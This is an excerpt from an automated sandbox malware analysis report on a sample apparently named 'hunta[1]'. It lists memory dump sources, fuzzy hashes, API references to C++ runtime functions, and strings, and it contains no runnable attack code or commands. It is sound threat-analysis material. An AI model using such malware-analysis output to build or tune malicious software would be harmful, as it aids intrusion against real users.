                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::invalid_argument::invalid_argument
                                    • String ID: string too long
                                    • API String ID: 2141394445-2556327735
                                    • Opcode ID: e04de53caf5d77beef21610853c35358d76ce74f8e863aa85fe9e458d96f588b
                                    • Instruction ID: 28280dc624f04856d868d99cb2643d00d1b1f80eddc5e2f15566230b8e9ea39e
                                    • Opcode Fuzzy Hash: e04de53caf5d77beef21610853c35358d76ce74f8e863aa85fe9e458d96f588b
                                    • Instruction Fuzzy Hash: E88120759042869FDB01DFA8C4517EEBFF5EF1A300F285298CA887B782C3758545CBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 020c9c333501c2a2accd6ff461ec757bd2022307db3550eb4591f2b30121e9e5
                                    • Instruction ID: dc3115dcdb9b276a20d577766b10b1c699c8127b869ccd7a9e50f9afdda227c6
                                    • Opcode Fuzzy Hash: 020c9c333501c2a2accd6ff461ec757bd2022307db3550eb4591f2b30121e9e5
                                    • Instruction Fuzzy Hash: C5921331D002488FDF19DBA8C8547EEBBB5EF46314F288299D45DBB292E7305A46CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f599bc2a352dc97002bd5086a88f188b6704939aa52897f9b7f1f5016f490aa
                                    • Instruction ID: 33e4cc639edcc8e2162e9e8374df475898803d2b8803d18fe1ae87716d914768
                                    • Opcode Fuzzy Hash: 8f599bc2a352dc97002bd5086a88f188b6704939aa52897f9b7f1f5016f490aa
                                    • Instruction Fuzzy Hash: B16280B0E002059BDB14CF59C5847AEBBF1BF88314F2481ADD944AB392D775EA46EF90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e27657e2426f5e288bb23acf8ba92d3076d4ce45e3481c01435f9d402d157b14
                                    • Instruction ID: e0797f8a90a8840eb34c93e09edd1913b62cae351ba8a91ff56832266e5fc8ec
                                    • Opcode Fuzzy Hash: e27657e2426f5e288bb23acf8ba92d3076d4ce45e3481c01435f9d402d157b14
                                    • Instruction Fuzzy Hash: 1CC1FF70D0870ACFCB25CF68C984A7ABBB9EF06320F18461ED45287691C7B2AD45FB50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a1c432529ce6ea95998167711e23de13a6958e91690fdabaf7ceabbdf75ff52
                                    • Instruction ID: 81db56f7c742b002c94d92d7d4b90698010549490c930ccc3ea6e2984dd5ed19
                                    • Opcode Fuzzy Hash: 2a1c432529ce6ea95998167711e23de13a6958e91690fdabaf7ceabbdf75ff52
                                    • Instruction Fuzzy Hash: B7712275E001468FDB119F69C8D07EEBBB5EB0A304F54126CD95CA7783C3399906DBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c9d3dd24c31ee732b7f52dfd0e5f5a312fa7721b909be9fa3ee71b0d5aa590d2
                                    • Instruction ID: 874593850480b117479c6f741bd7c0487c5566e36dbcc7c7242cd05dbf93fdc1
                                    • Opcode Fuzzy Hash: c9d3dd24c31ee732b7f52dfd0e5f5a312fa7721b909be9fa3ee71b0d5aa590d2
                                    • Instruction Fuzzy Hash: 276135316341694FD758CF5EECD043AB351E39A32138A421FEA81CB395C575EA26E7E0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77845ef3a3e9b1f1188eb4f95351de9247bec117f3bf2e20c84e530f5c992144
                                    • Instruction ID: 2aeac7582f8b0026e6de0aeafb7888d1ad08367d0e753a2db93cb849864ad637
                                    • Opcode Fuzzy Hash: 77845ef3a3e9b1f1188eb4f95351de9247bec117f3bf2e20c84e530f5c992144
                                    • Instruction Fuzzy Hash: D451B1B1E012099FDF08DF68C841BEEBBB4FF48314F108269E915B7380E7759A448BA4
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                    • Instruction ID: feb218d2a47310952affbbb99fea3b97b65e1f96446f40f59fb07fae47c3d027
                                    • Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
                                    • Instruction Fuzzy Hash: 65518172D00219EFDF04CF99C841AEEBBF6FF88314F198059E915AB241D734AA50DB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: f89e40cb7768e84ad6909f14f66b060e18f75d1654c61bd57af5da251b3156f8
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 96112BB7A4418243D628CA2EC4F56BBA395EBD533273C437AD1824F758DE62D945F600
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 079b9bf07538038380de2479634e16dda71df8c6d05e8b951cae7925505e9f5c
                                    • Instruction ID: 0eab48aeaff4fbe7600e1f9b1b4fae7744227e16229e078dc5922ed6144dc308
                                    • Opcode Fuzzy Hash: 079b9bf07538038380de2479634e16dda71df8c6d05e8b951cae7925505e9f5c
                                    • Instruction Fuzzy Hash: 6FF0E5F340C2606EB642C9E16799DF72BEEE9D2270321CC57F846CA427C3981D4E5136
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00EEAB43
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00EEAB65
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00EEAB85
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00EEABAF
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00EEAC1D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00EEAC69
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00EEAC83
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00EEAD18
                                    • std::_Facet_Register.LIBCPMT ref: 00EEAD25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: d33a32ce90d2405068ea3b88ca5bfd5ce78402658cc9ee1e4dc677b796701ee0
                                    • Instruction ID: 04ba5c535d1d759f6d3a5e434f861cd82371f34e1ccd0ce50c5d6bdc7b0d6236
                                    • Opcode Fuzzy Hash: d33a32ce90d2405068ea3b88ca5bfd5ce78402658cc9ee1e4dc677b796701ee0
                                    • Instruction Fuzzy Hash: 706150B1D002489FDF11DFA5DD45B9EBBB4AF14354F184069E804BB381E739E909DBA2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E837E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E83835
                                    • __Getctype.LIBCPMT ref: 00E8384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00E8386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E838FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:$bad locale name
                                    • API String ID: 1840309910-2133831286
                                    • Opcode ID: 0e359f722b8e0089dfe1c1ff736a0b1bd02019b432141132bc404192d2eeeb58
                                    • Instruction ID: c0a6cd02b6202f9e376233fa597e23dfff4ee92374d3edd2c10ad2a471993fe1
                                    • Opcode Fuzzy Hash: 0e359f722b8e0089dfe1c1ff736a0b1bd02019b432141132bc404192d2eeeb58
                                    • Instruction Fuzzy Hash: E85150F1D003489BDB10EFA5DC4579EBBB8AF14714F144129ED08BB281E779EA09DB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00F60507
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F6050F
                                    • _ValidateLocalCookies.LIBCMT ref: 00F60598
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F605C3
                                    • _ValidateLocalCookies.LIBCMT ref: 00F60618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 7bf2def2c25cdfcc67e84c51f2da82f9f45fb282af431bc9872c0bda201835a8
                                    • Instruction ID: 50d11b516fb56c61699ad2059ae72d9dfece9e7bbe2807404b60edc7349ea58c
